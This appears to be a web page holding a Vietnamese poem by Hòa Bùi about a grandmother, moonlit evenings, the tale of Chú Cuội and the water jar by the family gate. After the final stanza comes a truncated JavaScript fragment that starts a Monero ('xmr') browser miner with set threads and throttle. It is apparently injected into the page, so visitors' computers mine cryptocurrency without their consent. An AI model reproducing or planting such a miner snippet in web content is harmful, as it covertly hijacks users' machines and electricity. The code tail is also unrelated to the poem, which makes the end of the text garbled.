Bà Ngoại tui và ánh trăng - Hòa Bùi -

27 Tháng 2 lúc 20:29 ·

Bà Ngoại tui và ánh trăng

Hòa Bùi

Thuở còn bé con con
Tui hay theo bà ngoại
Nhớ mỗi khi trăng tròn
Bà lấy trầu ra... ngoáy !

Bà kể chuyện Chú Cuội
Nói sạo dữ lắm luôn
Sạo đến nỗi bị đuổi
Ôm gốc đa lệ tuôn...

Nhớ khay trầu của bà
Nhớ cái lu nước uống
Lu nước trước cổng nhà
Khách vãng lai ưa chuộng...

Đêm trăng rằm tháng giêng
Tiết Nguyên Tiêu sắp đến
Nhớ dáng bà dịu hiền
Lưng còng, cười dễ mến...

Bà kể chuyện trăng lên
Con nước sông sẽ lớn
Cá tôm chúng ngông nghênh
Bị lưới giăng chẳng tởn...

Cắc cớ tui hỏi bà :
" Trăng lên thì nước lên
Sao lu nước trong nhà
Chẳng đầy tự ên nhỉ ?!"

Bà cốc đầu cháu yêu
Cười móm mém cái miệng
Bảo đi học đủ điều
Hãy để ý mọi chuyện...

Bà vắng xa đã lâu
Cháu bà giờ có...cháu
Thời gian chẳng chìm sâu
Ký ức thuở khờ khạo...

Ngắm trăng lên nhớ bà
Nhớ chuyện xưa bà kể
Nhớ lu nước trước nhà
Bên cuộc đời dâu bể...

', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();